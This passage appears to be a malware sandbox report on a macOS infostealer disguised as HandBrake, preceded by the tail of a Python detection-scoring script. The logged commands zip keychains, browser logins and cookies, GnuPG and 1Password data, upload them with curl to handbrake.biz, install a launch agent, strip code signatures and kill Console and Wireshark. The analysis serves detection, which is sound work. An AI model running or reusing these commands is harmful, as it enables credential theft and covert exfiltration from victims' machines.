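    for pid, cmd in events:
        names = match_command(cmd)
        if names:
            hits.setdefault(pid, []).extend(names)
    return hits


def verdict(events, threshold=10):
    """Score each distinct rule once, so a loop of zips does not inflate the total."""
    triggered = []
    for names in analyze(events).values():
        for name in names:
            if name not in triggered:
                triggered.append(name)
    score = sum(WEIGHTS[n] for n in triggered)
    return score, triggered, ("malicious" if score >= threshold else "clean")


if __name__ == "__main__":
    for pid, names in analyze(SAMPLE_EVENTS).items():
        print(pid, names)
    print(verdict(SAMPLE_EVENTS))
    print(verdict(BENIGN_EVENTS))
```

In practice the matching would run over EDR process events with the parent PID joined in, since every one of these commands was spawned by activity_agent through `/bin/sh -c`; an unsigned bundle under ~/Library that fans out into zip, curl -F, codesign and launchctl within a few seconds is a stronger pivot than any single command.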
Executes the "chmod" command used to modify permissions
Source: /bin/sh (PID: 626) | Chmod executable: /bin/chmod -> chmod -R 777 /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks
Source: /bin/sh (PID: 675) | Chmod executable: /bin/chmod -> chmod 644 /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Executes the "curl" command used to transfer data via the network (usually using HTTP/S)
Source: /bin/sh (PID: 586) | Curl executable: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 597) | Curl executable: /usr/bin/curl -> curl -s --connect-timeout 10 -o /tmp/au https://handbrake.biz/rsa
Source: /bin/sh (PID: 669) | Curl executable: /usr/bin/curl -> curl -s -F full_name=vreni -F username=vreni -F password= -F root_password=failure -F serial=C07N355HDWYL -F hostname=vreni%E2%80%99s Mac mini -F signed=0 -F file=@/Users/vreni/Library/VideoFrameworks/proton.zip -F api_key=9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57ea -F cts=1494347197 -F signature=77aa1c7aafbc61542eb30c0f1a1cb7f29c68adcaf5dbaa73561688d648c4f7b6 https://handbrake.biz/api/init
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/sh (PID: 632) | Grep executable: /usr/bin/grep -> grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 634) | Grep executable: /usr/bin/grep -> grep Path= profiles.ini
Source: /bin/sh (PID: 638) | Grep executable: /usr/bin/grep -> grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 640) | Grep executable: /usr/bin/grep -> grep Path= profiles.ini
Source: /bin/sh (PID: 644) | Grep executable: /usr/bin/grep -> grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 646) | Grep executable: /usr/bin/grep -> grep Path= profiles.ini
Source: /bin/sh (PID: 650) | Grep executable: /usr/bin/grep -> grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 652) | Grep executable: /usr/bin/grep -> grep Path= profiles.ini
Executes the "mkdir" command used to create folders
Source: /bin/sh (PID: 625) | Mkdir executable: /bin/mkdir -> mkdir -p /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks /Users/vreni/Library/LaunchAgents/
Executes the "ping" command used for connectivity testing via ICMP
Source: /bin/sh (PID: 600) | Ping executable: /sbin/ping -> ping -c 1 handbrake.biz
Source: /bin/sh (PID: 604) | Ping executable: /sbin/ping -> ping -c 1 handbrakestore.com
Source: /bin/sh (PID: 606) | Ping executable: /sbin/ping -> ping -c 1 handbrake.cc
Source: /bin/sh (PID: 609) | Ping executable: /sbin/ping -> ping -c 1 luwenxdsnhgfxckcjgxvtugj.com
Source: /bin/sh (PID: 611) | Ping executable: /sbin/ping -> ping -c 1 6gmvshjdfpfbeqktpsde5xav.com
Source: /bin/sh (PID: 613) | Ping executable: /sbin/ping -> ping -c 1 kjfnbfhu7ndudgzhxpwnnqkc.com
Source: /bin/sh (PID: 615) | Ping executable: /sbin/ping -> ping -c 1 yaxw8dsbttpwrwlq3h6uc9eq.com
Source: /bin/sh (PID: 617) | Ping executable: /sbin/ping -> ping -c 1 qrtfvfysk4bdcwwwe9pxmqe9.com
Source: /bin/sh (PID: 619) | Ping executable: /sbin/ping -> ping -c 1 fyamakgtrrjt9vrwhmc76v38.com
Source: /bin/sh (PID: 621) | Ping executable: /sbin/ping -> ping -c 1 kcdjzquvhsua6hlfbmjzkzsb.com
Source: /bin/sh (PID: 623) | Ping executable: /sbin/ping -> ping -c 1 ypu4vwlenkpt29f95etrqllq.com
Executes the "touch" command used to create files or modify time stamps
Source: /bin/sh (PID: 670) | Touch executable: /usr/bin/touch -> touch /Users/vreni/Library/VideoFrameworks/.ptrun
Explicitly loads/starts launch services
Source: /bin/sh (PID: 679) | Launch agent/daemon loaded: launchctl load /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Reads launchservices plist files
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Reads user launchservices plist file containing default apps for corresponding filetypes
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Uses Security framework containing interfaces for system-level user authentication and authorization
Source: /usr/bin/codesign (PID: 676) | Security framework info plist opened: /System/Library/Frameworks/Security.framework/Resources/Info.plist
Writes 64-bit Mach-O files to disk
Source: /bin/cp (PID: 663) | File written: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/libexec/DeveloperTools/codesign_allocate (PID: 677) | File written: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp
Writes ZIP files to disk
Source: /usr/bin/zip (PID: 627) | ZIP file created: /Users/vreni/Library/VideoFrameworks/zihaRvzn
Source: /usr/bin/zip (PID: 655) | ZIP file created: /Users/vreni/Library/VideoFrameworks/ziSznLAI
Source: /usr/bin/zip (PID: 658) | ZIP file created: /Users/vreni/Library/VideoFrameworks/ziHyh3w6
Writes icon files to disk
Source: /bin/cp (PID: 663) | File written: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/h.icns
Writes shell script files to disk
Source: /bin/cp (PID: 663) | Shell script file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/mozilla.sh
Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 661) | Rm executable: /bin/rm -> rm -rf grace_period
Source: /bin/sh (PID: 678) | Rm executable: /bin/rm -> rm -rf /Users/vreni/Library/RenderFiles/activity_agent.app/Ic*
Source: /bin/sh (PID: 682) | Rm executable: /bin/rm -> rm -rf /Users/vreni/Desktop/unpack/activity_agent.app
Executes the "sudo" command used to execute a command as another user
Source: /bin/sh (PID: 589) | Sudo executable: /usr/bin/sudo -> sudo -k
Source: /bin/sh (PID: 592) | Sudo executable: /usr/bin/sudo -> sudo -S echo success
Many shell processes execute programs via execve syscall (may be indicative of malicious behaviour)
Source: /bin/sh (PID: 581) | Shell process: openssl rsautl -verify -in /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/.tmpdata -pubin -inkey /tmp/public.pem
Source: /bin/sh (PID: 583) | Shell process: nc -G 20 -z 8.8.8.8 53
Source: /bin/sh (PID: 586) | Shell process: curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 589) | Shell process: sudo -k
Source: /bin/sh (PID: 592) | Shell process: sudo -S echo success
Source: /bin/sh (PID: 597) | Shell process: curl -s --connect-timeout 10 -o /tmp/au https://handbrake.biz/rsa
Source: /bin/sh (PID: 598) | Shell process: openssl rsautl -verify -in /tmp/au -pubin -inkey /tmp/au.pub
Source: /bin/sh (PID: 600) | Shell process: ping -c 1 handbrake.biz
Source: /bin/sh (PID: 604) | Shell process: ping -c 1 handbrakestore.com
Source: /bin/sh (PID: 606) | Shell process: ping -c 1 handbrake.cc
Source: /bin/sh (PID: 609) | Shell process: ping -c 1 luwenxdsnhgfxckcjgxvtugj.com
Source: /bin/sh (PID: 611) | Shell process: ping -c 1 6gmvshjdfpfbeqktpsde5xav.com
Source: /bin/sh (PID: 613) | Shell process: ping -c 1 kjfnbfhu7ndudgzhxpwnnqkc.com
Source: /bin/sh (PID: 615) | Shell process: ping -c 1 yaxw8dsbttpwrwlq3h6uc9eq.com
Source: /bin/sh (PID: 617) | Shell process: ping -c 1 qrtfvfysk4bdcwwwe9pxmqe9.com
Source: /bin/sh (PID: 619) | Shell process: ping -c 1 fyamakgtrrjt9vrwhmc76v38.com
Source: /bin/sh (PID: 621) | Shell process: ping -c 1 kcdjzquvhsua6hlfbmjzkzsb.com
Source: /bin/sh (PID: 623) | Shell process: ping -c 1 ypu4vwlenkpt29f95etrqllq.com
Source: /bin/sh (PID: 625) | Shell process: mkdir -p /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks /Users/vreni/Library/LaunchAgents/
Source: /bin/sh (PID: 626) | Shell process: chmod -R 777 /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks
Source: /bin/sh (PID: 627) | Shell process: zip -r /Users/vreni/Library/VideoFrameworks/KC.zip /Users/vreni/Library/Keychains/ /Library/Keychains/
Source: /bin/sh (PID: 628) | Shell process: zip /Users/vreni/Library/VideoFrameworks/CR.zip /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/Login Data /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/Cookies /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/Bookmarks /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/History /Users/vreni/Library/Application Support/Google/Chrome/Profile 1/Web Data
Source: /bin/sh (PID: 629) | Shell process: zip /Users/vreni/Library/VideoFrameworks/CR_def.zip /Users/vreni/Library/Application Support/Google/Chrome/Default/Login Data /Users/vreni/Library/Application Support/Google/Chrome/Default/Cookies /Users/vreni/Library/Application Support/Google/Chrome/Default/Bookmarks /Users/vreni/Library/Application Support/Google/Chrome/Default/History /Users/vreni/Library/Application Support/Google/Chrome/Default/Web Data
Source: /bin/sh (PID: 631) | Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 632) | Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 634) | Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 635) | Shell process: sed s/^Path=//
Source: /bin/sh (PID: 637) | Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 638) | Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 640) | Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 641) | Shell process: sed s/^Path=//
Source: /bin/sh (PID: 643) | Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 644) | Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 646) | Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 647) | Shell process: sed s/^Path=//
Source: /bin/sh (PID: 649) | Shell process: sh /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/mozilla.sh
Source: /bin/sh (PID: 650) | Shell process: grep \[Profile[^0]\] profiles.ini
Source: /bin/sh (PID: 652) | Shell process: grep Path= profiles.ini
Source: /bin/sh (PID: 653) | Shell process: sed s/^Path=//
Source: /bin/sh (PID: 654) | Shell process: zip -r /Users/vreni/Library/VideoFrameworks/FF.zip /Users/vreni/Library/Application Support/Firefox//cookies.sqlite /Users/vreni/Library/Application Support/Firefox//formhistory.sqlite /Users/vreni/Library/Application Support/Firefox//logins.json /Users/vreni/Library/Application Support/Firefox//logins.json
Source: /bin/sh (PID: 655) | Shell process: zip -r /Users/vreni/Library/VideoFrameworks/SF.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/Form Values
Source: /bin/sh (PID: 656) | Shell process: zip -r /Users/vreni/Library/VideoFrameworks/OP.zip /Users/vreni/Library/Application Support/com.operasoftware.Opera/Login Data /Users/vreni/Library/Application Support/com.operasoftware.Opera/Cookies /Users/vreni/Library/Application Support/com.operasoftware.Opera/Web Data
Source: /bin/sh (PID: 657) | Shell process: zip -r /Users/vreni/Library/VideoFrameworks/GNU_PW.zip /Users/vreni/.gnupg /Users/vreni/Library/Application Support/1Password 4 /Users/vreni/Library/Application Support/1Password 3.9
Source: /bin/sh (PID: 658) | Shell process: zip -r /Users/vreni/Library/VideoFrameworks/proton.zip /Users/vreni/Library/VideoFrameworks
Source: /bin/sh (PID: 659) | Shell process: killall Console
Source: /bin/sh (PID: 660) | Shell process: killall Wireshark
Source: /bin/sh (PID: 661) | Shell process: rm -rf grace_period
Source: /bin/sh (PID: 663) | Shell process: cp -R /Users/vreni/Desktop/unpack/activity_agent.app /Users/vreni/Library/RenderFiles/activity_agent.app
Source: /bin/sh (PID: 664) | Shell process: mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /bin/sh (PID: 665) | Shell process: mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/Info_.plist /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist
Source: /bin/sh (PID: 666) | Shell process: mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/fr.handbrake.activity_agent.plist /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 669) | Shell process: curl -s -F full_name=vreni -F username=vreni -F password= -F root_password=failure -F serial=C07N355HDWYL -F hostname=vreni%E2%80%99s Mac mini -F signed=0 -F file=@/Users/vreni/Library/VideoFrameworks/proton.zip -F api_key=9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57ea -F cts=1494347197 -F signature=77aa1c7aafbc61542eb30c0f1a1cb7f29c68adcaf5dbaa73561688d648c4f7b6 https://handbrake.biz/api/init
Source: /bin/sh (PID: 670) | Shell process: touch /Users/vreni/Library/VideoFrameworks/.ptrun
Source: /bin/sh (PID: 673) | Shell process: sed -i -e s/P_MBN/fr.handbrake.activity_agent/g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 674) | Shell process: sed -i -e s=P_UPTH=/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent=g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 675) | Shell process: chmod 644 /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 676) | Shell process: codesign --remove-signature /Users/vreni/Library/RenderFiles/activity_agent.app
Source: /bin/sh (PID: 678) | Shell process: rm -rf /Users/vreni/Library/RenderFiles/activity_agent.app/Ic*
Source: /bin/sh (PID: 679) | Shell process: launchctl load /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 680) | Shell process: killall Console
Source: /bin/sh (PID: 681) | Shell process: killall Wireshark
Source: /bin/sh (PID: 682) | Shell process: rm -rf /Users/vreni/Desktop/unpack/activity_agent.app
Reads local browser cookies
Source: /usr/bin/zip (PID: 655)Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Source: /usr/bin/zip (PID: 655)Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 659)Killall command executed: killall Console
Source: /bin/sh (PID: 660)Killall command executed: killall Wireshark
Source: /bin/sh (PID: 680)Killall command executed: killall Console
Source: /bin/sh (PID: 681)Killall command executed: killall Wireshark
Writes Mach-O files to unusual directories
Source: /bin/cp (PID: 663)64-bit Mach-O written to unusual path: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/libexec/DeveloperTools/codesign_allocate (PID: 677)64-bit Mach-O written to unusual path: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp

Hooking and other Techniques for Hiding and Protection:

Denies being traced/debugged (via ptrace PT_DENY_ATTACH)
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)PTRACE system call (PT_DENY_ATTACH): PID 579 denies future traces
Explicitly terminates console (used for log message viewing) processes
Source: /bin/sh (PID: 659)Kills 'Console' processes: killall Console
Source: /bin/sh (PID: 680)Kills 'Console' processes: killall Console
Explicitly terminates network capturing processes
Source: /bin/sh (PID: 660)Kills 'Wireshark' processes: killall Wireshark
Source: /bin/sh (PID: 681)Kills 'Wireshark' processes: killall Wireshark
Moves itself during installation or deletes itself after installation
Source: /usr/bin/zip (PID: 627)File deleted: /Users/vreni/Library/VideoFrameworks/KC.zip
Source: /usr/bin/zip (PID: 627)File moved: /Users/vreni/Library/VideoFrameworks/zihaRvzn -> /Users/vreni/Library/VideoFrameworks/KC.zip
Source: /usr/bin/zip (PID: 655)File deleted: /Users/vreni/Library/VideoFrameworks/SF.zip
Source: /usr/bin/zip (PID: 655)File moved: /Users/vreni/Library/VideoFrameworks/ziSznLAI -> /Users/vreni/Library/VideoFrameworks/SF.zip
Source: /usr/bin/zip (PID: 658)File deleted: /Users/vreni/Library/VideoFrameworks/proton.zip
Source: /usr/bin/zip (PID: 658)File moved: /Users/vreni/Library/VideoFrameworks/ziHyh3w6 -> /Users/vreni/Library/VideoFrameworks/proton.zip
Source: /bin/mv (PID: 664)File moved: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent -> /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/bin/codesign (PID: 676)File moved: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp -> /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent

HIPS / PFW / Operating System Protection Evasion:

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: kern.safeboot (1.66)
Executes the "codesign" command used to create and manipulate code signatures
Source: /bin/sh (PID: 676)Codesign executable: /usr/bin/codesign -> codesign --remove-signature /Users/vreni/Library/RenderFiles/activity_agent.app

Language, Device and Operating System Detection:

Reads the system or server version plist file
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Reads hardware related sysctl values
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: hw.ncpu (6.3)
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: hw.availcpu (6.25)
Reads the kernel OS version value
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: kern.osversion (1.65)
Reads the system's OS release and/or type
Source: /usr/bin/curl (PID: 586)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 597)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 669)Sysctl requested: kern.osrelease (1.2)
Reads the system's hostname
Source: /bin/sh (PID: 580)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 582)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 584)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 588)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 589)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 589)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 590)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 592)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 594)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 595)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 598)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 599)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 603)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 605)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 608)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 610)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 612)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 614)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 616)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 618)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 620)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 622)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 624)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 631)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 637)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 643)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 649)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 662)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 667)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 670)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 671)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 672)Sysctl requested: kern.hostname (1.10)

Stealing of Sensitive Information:

May steal keychain information which contains credentials
Source: /usr/bin/zip (PID: 627)Keychain directory enumerated: /Users/vreni/Library/Keychains
Source: /usr/bin/zip (PID: 627)Keychain directory enumerated: /Library/Keychains


Runtime Messages

Command:open
Exitcode:0
Killed:False
Standard Output:
Standard Error:

Yara Overview

No Yara matches

Screenshot